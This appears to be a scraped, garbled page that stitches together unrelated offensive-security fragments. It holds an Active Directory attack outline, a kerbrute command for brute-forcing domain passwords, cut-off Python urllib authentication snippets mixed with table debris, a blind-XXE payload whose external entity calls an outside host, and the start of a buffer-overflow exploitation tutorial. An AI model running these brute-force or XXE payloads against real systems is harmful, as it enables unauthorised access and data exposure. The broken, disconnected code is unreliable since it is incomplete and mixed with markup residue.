Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
Note: I did not author this, i found it somehwere.
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
import urllib.request | |
import urllib.response | |
userName = "user" | |
passWord = "password" | |
top_level_url = "http://127.0.0.1/api/update" | |
# create an authorization handler | |
p = urllib.request.HTTPPasswordMgrWithDefaultRealm() | |
p.add_password(None, top_level_url, userName, passWord); |
#!/usr/bin/env python | |
# | |
# tested by Python 3.4.3 on Windows 8.1 | |
# Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32 | |
# If you need to access web site/service via proxy, set http_proxy or https_proxy. | |
# https://docs.python.org/3/library/urllib.request.html#urllib.request.ProxyHandler | |
# set http_proxy=http://127.0.0.1:8888/ | |
# set https_proxy=https://127.0.0.1:8888/ |
#!/usr/bin/env python | |
# | |
# I tested by Python 3.4.3 on Windows 8.1 | |
# Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32 | |
import urllib.request | |
import getpass | |
# If you access to url below via Proxy, | |
# set environment variable 'http_proxy' before execute this. |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent